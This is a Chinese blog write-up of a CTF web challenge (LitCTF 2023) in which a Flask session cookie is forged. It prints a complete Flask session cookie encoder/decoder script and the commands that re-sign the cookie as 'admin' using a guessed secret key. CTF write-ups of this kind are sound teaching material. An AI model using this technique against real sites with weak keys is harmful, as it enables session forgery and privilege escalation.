[LitCTF 2023]Flag点击就送!(cookie伪造)

最新推荐文章于 2024-08-23 20:21:58 发布
最新推荐文章于 2024-08-23 20:21:58 发布
阅读量2.2k 收藏 8
点赞数 7
分类专栏: web 文章标签: servlet cookie Python flask session
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/130812152
版权

随便输一个名字

 

 

 尝试admin

 但是我们在cookie里找到了一些东西

session:"eyJuYW1lIjoiYWRtaW4ifQ.ZGs1vw.7ikpuOhUtXxyB2UV-FH7UGIZkaE" 

 想到session伪造

先说一下session的作用:
由于http协议是一个无状态的协议,也就是说同一个用户第一次请求和第二次请求是完全没有关系的,但是现在的网站基本上有登录使用的功能,这就要求必须实现有状态,而session机制实现的就是这个功能。
用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;这段状态信息分配了一个唯一的标识符用来标识用户的身份,将其保存在响应对象的cookie中;当第二次请求时,解析cookie中的标识符,拿到标识符后去session找到对应的用户的信息。

 session伪造攻击是一种非常流行的针对session的攻击方式.它之所以流行的主要原因是:它是一个攻击者获得一个有效的SESSION ID(标识符)最简单的方法,使用这种方法,可以模仿当前用户的SESSION ID,伪装成这个用户,然后进一步进行SESSION劫持攻击。

通过查看发现web构架为flask,

Flask是一个轻量级的Python Web框架,它具有简单、灵活、易扩展等特点。

flask session的储存方式:

第一种方式:直接存在客户端的cookies中

第二种方式:存储在服务端,如:redis,memcached,mysql,file,mongodb等等,存在flask-session第三方库,flask的session可以保存在客户端的cookie中,那么就会产生一定的安全问题。

flask框架的session若存储在客户端,就需要解决session被恶意纂改的问题,而flask通过一个secret_key,也就是密钥对数据进行签名来防止session被纂改。
 

flask的session格式:

flask的session格式一般是由base64加密的Session数据(经过了json、zlib压缩处理的字符串) 、时间戳 、签名组成的。

将cookie值进行base64解码

输出是json格式存储,还有一堆乱码,应该就是数据签名。

 json的全称为:JavaScript Object Notation,是一种轻量级的数据交互格式。

JSON支持数据格式:

json的数据可以用花括号{}或中括号[]包裹,对应js中的object和array

对象:使用花括号
数组:使用方括号
字符串类型:必须使用双引号
整形、浮点型、布尔类型还有null类型
多个数据之间使用逗号分开

json本质上就是一个字符串

来看一段json数据:{"name":"admin","age":18}

要进行session伪造我们就要先得到secret_key,这里猜测key为LitCTF

附上Python脚本

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

上面脚本的用法:

解密

python flask_session_cookie_manager3.py decode -s 'secret_key' -c '需要解密的session值'

加密

python flask_session_cookie_manager3.py encode -s 'secret_key' -t '需要加密的session值'

(flask_session_cookie_manager3.py是你保存的脚本的名字)

因为题目说只有管理员才能拿到flag

根据前面base64解码得到session(json)格式,我们将name伪造为admin

并对session数据进行加密

 

将伪造的cookie传给session

 拿到flag 

NSSCTF{df845e3b-f834-405e-9a49-3f847c5341fe}

Myon⁶
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
2023LitCTF web组wp
m0_74160536的博客
05-17 1165
1、导弹迷踪2、1zjs3、php是世界上最好的语言!!4、Ping5、我Flag呢?7、作业管理系统8、Vim yyds10、这是什么?SQL!注一下!11、Flag点击!12、就当无事发生13、彩蛋。
vc 伪造cookie例子
06-01
在IT安全领域,"伪造cookie"是一个敏感且重要的主题,特别是在网络编程中。本文将深入探讨使用VC++(Visual C++)如何实现这一技术,并理解其背后的原理与风险。 首先,让我们了解一下什么是CookieCookie是服务器...
NSSCTF中的[WUSTCTF 2020]朴实无华、[FSCTF 2023]源码!启动! 、[LitCTF 2023]Flag点击! 以及相关知识点
2401_82388450的博客
06-19 799
补充:==弱类型比较中,字符'0e123'和字符'0e456'虽然是字符类型,但是因为==比较不比较数据类型,只比较值,而值就是科学计数法的表示格式,结果都是0,所以相等,返回true ===强类型比较中,字符'0e123'和字符'0e456'在比较数据类型的时候就被当作字符类型,而字符'0e123'和字符'0e456'当然不相等,所以返回false。用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;
[LitCTF 2023]Flag点击
陈艺秋的博客
08-27 821
通过抓包后,在cookie字段发现了 特殊的东西,前面翻译过来跟题目没有太大关系,所以最后就看session字段,看着不像是base64,burp解码也不行。最后查看wp,结果发现还是base64,不过有些字符是乱码,所以一般的工具解密不出来。但是没有secret_key,有点离谱的是,看了几个wp都说直接盲猜是比赛名称。根据题目提示,和本题环境为flask,得知本题考察session伪造。然后就可以点击获取flag,结果回显提示,需要获取管理员。进入环境后是一个输入框,可以提交名字。
LitCTF-2023-web部分
m0_74097148的博客
05-18 1877
也有多种解法,当然如果上传有黑名单限制 但是远程下载没有 则可以用远程下载去下载PHP木马文件,然后剩余的步骤和上传木马的操作一样 不多做说明。并且题目提示我们只有username, password两列, 不需要group by去判断列数了。输入如下图的内容, 下载后点击编辑文件即可看到flag。如果想要了解更多关于http头部的信息可以参考。
[LitCTF 2023]Flag点击!--session伪造
qq_75120258的博客
04-18 920
由于http协议是一个无状态的协议,也就是说同一个用户第一次请求和第二次请求是完全没有关系的,但是现在的网站基本上有登录使用的功能,这就要求必须实现有状态,而session机制实现的就是这个功能。 用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;这段状态信息分配了一个唯一的标识符用来标识用户的身份,将其保存在响应对象的cookie中;当第二次请求时,解析cookie中的标识符,拿到标识符后去session找到对应的用户的信
[LitCTF 2023]刷题记录
rev1ve的博客
05-17 845
提示我们不是来自于pornhub.com,利用Referer。发现为文件上传,直接传php发现成功(啥过滤都没有)F12一下发现提示admin,admin,直接登录。题目提示vim编辑器,用kali打开文件。发现题目已经告诉我们sql语句的闭合方式。直接去/.index.php.swp下。我们ping一下,127.0.0.1。直接在game.js找到flag。我们得伪造admin,加密一下。打开题目,直接js找flag。发现有过滤,要绕过前端检测。再次输入命令,得到flag。找了半天,发现是改过的。
LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分
Aluxian_的博客
05-14 6731
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF
LitCTF2023 郑州轻工业大学网络安全赛--web方向
qq_44640313的博客
05-18 706
LitCTF2023--web方向wp
PHP中的cookie不用刷新就生效的方法
10-28
调用`cookie()`函数设置名为"website"的Cookie,并赋予值"WEB开发笔记",然后通过`echo $_COOKIE["website"]`输出,这时由于已经将值直接写入了`$_COOKIE`,所以即使在设置后立即输出,也能获取到新设置的Cookie值,...
两道CTF流量分析题,寻找flag
03-10
提交格式为flag{密码} 题目2: 问题1:安全审计设备上捕获了一条OPC流量,疑似遭遇黑客攻击,请分析出黑客攻击的流量编号。(仅需找到流量编号即可) 问题2:找出藏匿在流量包中的flag(格式为flag{})
OS_FLAG.rar_os_flag
09-23
《深入解析UC/OS-II操作系统在ARM7上的移植与OS_FLAG.C源码分析》 UC/OS-II,全称为uC/OS-II,是一款实时嵌入式操作系统(RTOS),由Micrium公司开发,广泛应用于各种嵌入式系统,尤其是那些对实时性要求较高的场合...
OS_FLAG.rar_flag uc
09-23
标题“OS_FLAG.rar_flag uc”和描述“ucOs-ii完整源代码,极其方便用户调用”提及的是一个与操作系统相关的项目,特别是“ucOs-ii”的源代码。ucOs,全称为MicroC/OS-II,是一个实时操作系统(RTOS)内核,广泛应用...
刷题记录 【LitCTF 2023】导弹迷踪
qq_74414939的博客
05-18 737
根据题目提示,需要通过6关才能拿到flag。于是点击进去,进入之后是下面这个页面。但是这个游戏也忒难了,玩了几次都没能过6关。在页面的源码里面看了好一会儿,也没看见什么flag。于是我们换个思路,去看看其他文件。点击查看器右边的调试器,发现在src目录下面有一些js文件,于是我们逐一查看。终于在game.js里面发现了flag。将其改为NSSCTF形式即可。于是按照惯例,我们先通过F2打开源代码看看。(以Firefox为例)不过一般来说,拿flag都是不用玩游戏的。
Cookie伪造
cainiao17441898的博客
05-18 4548
解题: 创建了一个user用户登陆之后发现。 抓包看一下。
CTFshow_年CTF 2023
weixin_45908624的博客
01-28 797
_年CTF
LitCTF2023 Reverse 题解及复现
OrientalGlass的博客
05-14 2458
使用解包工具时要注意环境问题,这题是python3.8编写的,所以要用python3.8的环境,否则会缺少输出文件,建议使用anaconda管理python版本。关键代码是最后一段对flag的操作,不过这里可能是有意为之或者是反编译的问题,意思应该是flag[i]和flag[i+1]的数据异或后互换。经典的base64换表,第10和11行作用重复,12行也没有实际作用,此处的base表根本没有变化。关键就在于Probee代码中调用了check函数,该函数定义在ch中,分析程序逻辑不难写出解题脚本。
flask_apscheduler实现定时推飞书消息
最新发布
qq_17328759的博客
08-23 5325
flask_apscheduler 定时推飞书消息
思维导图2023flag
09-17
思维导图是一种用于整理思维、管理信息的图形化工具。2023flag则是指2023年的旗帜,结合这两者,我来讲一下思维导图在2023年可能的应用。 首先,随着信息时代的发展,思维导图将在2023年继续发挥重要的作用。人们在处理大量信息时,往往容易迷失在琐碎的细节中。而思维导图可以帮助人们将复杂的信息分解为简单的概念,并通过关联和连接来构建整体思维框架。这对于在2023年的工作和学习中都具有重要意义。 其次,在2023年,思维导图可能在教育领域得到更广泛的应用。传统的教学方式往往注重信息的灌输和吸收,缺乏对学生思维能力的培养。而思维导图作为一种主动学习工具,可以帮助学生理清知识的脉络,提升他们的思维能力和创造力。在2023年的课堂上,我们可能会看到更多的学生使用思维导图来整理知识、展示思维过程。 第三,随着人们对大脑认知机制的深入研究,思维导图的设计可能会更加符合人类的思维方式。2023年的思维导图可能会更加注重脑科学、心理学以及人机交互等领域的研究成果,使其更加符合人脑的运行规律,提高信息处理效率和记忆力。 最后,在2023年,随着技术的发展,思维导图工具可能会更加智能化和便捷化。人工智能的应用将使得思维导图工具更加智能化,能够自动识别和整理信息,为用户提供更加个性化和高效的导图服务。同时,移动设备的普及使得思维导图能够随时随地进行,给用户带来更多的便捷和灵活性。 总的来说,思维导图在2023年的前景仍然十分广阔。它将继续在工作、学习和创造领域发挥重要作用,并且随着科技的进步,思维导图工具将更加智能化和便捷化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值